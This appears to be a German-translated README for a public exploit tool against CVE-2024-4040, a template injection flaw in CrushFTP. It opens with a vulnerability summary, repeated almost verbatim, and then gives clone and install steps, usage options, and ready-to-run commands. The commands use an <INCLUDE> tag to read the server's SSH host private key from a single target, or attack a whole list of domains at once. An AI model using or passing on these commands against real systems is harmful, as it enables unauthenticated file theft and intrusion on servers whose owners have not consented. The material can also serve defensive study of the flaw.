
Eine serverseitige Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten Remote-Angreifern, Dateien aus dem Dateisystem außerhalb der VFS-Sandbox zu lesen, die Authentifizierung zu umgehen, um administrativen Zugriff zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.
Eine Server-seitige Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten entfernten Angreifern, Dateien aus dem Dateisystem außerhalb der VFS-Sandbox zu lesen, die Authentifizierung zu umgehen, um administrative Zugriffsrechte zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 instrall -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# STELLEN SIE SICHER, DASS SIE DAS <INCLUDE>-TAG ODER EIN ANDERES TAG VERWENDEN, UM DAS ZIEL AUSZUNUTZEN. MANCHMAL BENÖTIGEN SIE KEINE TAGS.
# Ein Ziel ausnutzen
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Eine Liste von Zielen ausnutzen
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
Bitte lesen Sie ATTACKERKB ANALYSE für ein besseres Verständnis, wie dieser Exploit verwendet wird.